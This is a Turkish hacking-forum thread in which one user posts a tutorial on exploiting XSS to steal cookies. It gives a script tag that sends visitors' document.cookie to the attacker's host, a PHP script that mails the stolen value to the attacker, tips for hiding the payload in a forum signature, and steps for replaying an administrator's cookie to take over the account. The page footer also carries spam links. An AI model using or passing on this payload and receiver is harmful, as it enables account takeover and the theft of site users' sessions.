Hoşgeldin, Ziyaretçi:
Yada Üye Ol

Kayıt:

"Bak, illegalin rengi legaldan daha güzel bu hikayede.. (ve bu yüzden yüklemesi bin kat daha uzun sürer!)" Eric Tilton derviş d = new derviş(); d.zikir = d.fikir; try { oldugungibigorun(); } catch(oldugumgibigorunemedimexception e) { gorundugungibiol(); }
Aramıza katılmak için şansın var.


Konuyu Takip Et

XSS Açığı Nedir? Nasıl Uygulanır?

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5


XSS Açığı Nedir? Nasıl Uygulanır?

#1
Çevrimdışı RujAjan

    Aktif Bulunmuyorum

  • Özel Üye
  • Yorum:
    2,488
  • Konu:
    380
  • Kayıt:
    28.10.2012
  • Üye Sayısı
    328
  • Rep Puanı:
    226

  • Günümüzde XSS açığı ile bir çok büyük sistemlere girilebiliyor. Şunu unutmayın; mesele XSS açığını bulmak değil, mesele XSS açığını bulduktan sonra devamını getirebilmektir.

    Gelelim konuya;
    XSS Nasıl Yapılır?
    Bu dökümanda size XSS ile bir hack yöntemi anlatacağım öncelikle işin mantığına değinmek istiyorum. Küçük bir javascript koduyla, kodun bulunduğu mevcut sayfaya ait cookie'yi çalabiliyoruz. Peki bu bizim ne işimize yarayacak? Ekleyeceğimiz bir php mail yollama koduyla elde edilen cookie değeri belirttiğimiz maile yollanabilir. Böylece o cookie değerini bizim o mevcut site uzerinde sahip olduğumuz cookie ile değiştirebiliriz. Yani eğer adminin cookie'yi çalarsak ve o sitedeki kendi cookiemiz ile değiştirirsek. Siteyi açtığımız an admin olarak giriş yapmış oluruz.

    Buradaki sorun ise sadece mevcut sayfanın cookie değerini alabilmesi, yani http://www.hedefsite.com uzerinde bu kodu yazabilmemiz lazım. Imzasında veya herhangi bir yerinde html kodu serbest olan forumda aşşağıdaki kodu giriyoruz:

    <script>window.navigate("http://www.sitem.com/cookieyolla.php?data=-+document.cookie)</script>

    Not: Bu kodu başka bir şeyin arkasına gizleyebilirsiniz, örneğin imzanızda html sayesinde kayan yazı koyarsınız ama arka planda bu kodda bulunur.

    Bu html kodu, kodun mevcut olduğu sayfayı açanların cookie değerlerini cookieyolla.php uzerinden bize yollamaktadır. Cookie yolla.php çok basit bir php kodudur, "data" değerini "cookieyolla.php" üzerinden maille atar -+document.cookie ise cookie yi çalan javascript kodudur. Işin mantığı bu.

    Cookieyolla.php kodu:

    <?

    $cookie = $_GET['data'];

    $kime = "deepimpact@ornekveriyorummail.com";

    $konu = "cookie";

    mail ($kime,$konu,$cookie);

    ?>




    Not: cookieyolla.php'yi kendiniz değiştirebilirsiniz, yaratıcılığınıza bağlı.

    deepimpact@ornekveriyorummail.com yerine cookie değerini yollamasını istediğiniz maili(yani kendi mailinizi yazın)

    Cookie elimize geldiği zaman "Bilgisayarım/C/DocumentsandSettings/Kullanıcıadı/Cookies" klasörü içindeki html kodunu soktuğunuz sitenin adının bulunduğu txt dosyasındaki cookie ile değiştirin böylece gelen cookie ile giriş yapmış olursunuz.

    #2
    Çevrimdışı el_dogan

      Forumdan Uzaklaştırıldı

    • Banned
  • Yorum:
    217
  • Konu:
    2
  • Kayıt:
    15.12.2012
  • Üye Sayısı
    582

  • anlatmakla bitmez xss Bir sure syı var






    Konu ile Alakalı Benzer Konular
    Konular Yazar Yorumlar Okunma Son Yorum
      Yeni Wordpress Açığı # N0XI N0XI 1 876 04.06.2017, Saat:16:11
    Son Yorum: Ens4R
      Mailman açığı zone kasmak isteyenler tess 67 8,334 31.01.2017, Saat:21:32
    Son Yorum: ByOz
      Gösterim Stili İndex'e Nasıl MÜZİK Eklenir? YildizTurk 0 440 11.09.2016, Saat:15:31
    Son Yorum: YildizTurk
      Hack'e Nasıl Başladım... #Reynuman 18 2,115 11.07.2016, Saat:21:54
    Son Yorum: Insurgent
      SQl İnjt Açığı Kaliteli Site rios 5 1,434 06.06.2016, Saat:22:31
    Son Yorum: kadoex

    Hızlı Menü:

    Konuyu Okuyanlar:

    1 Ziyaretçi

    * Taklitler Asıllarını Yüceltir *


    escort mersin izmir escort izmir escort alanya escort buca escort script indir
    sakarya escort izmir escort sakarya escort sakarya escort sakarya escort sakarya escort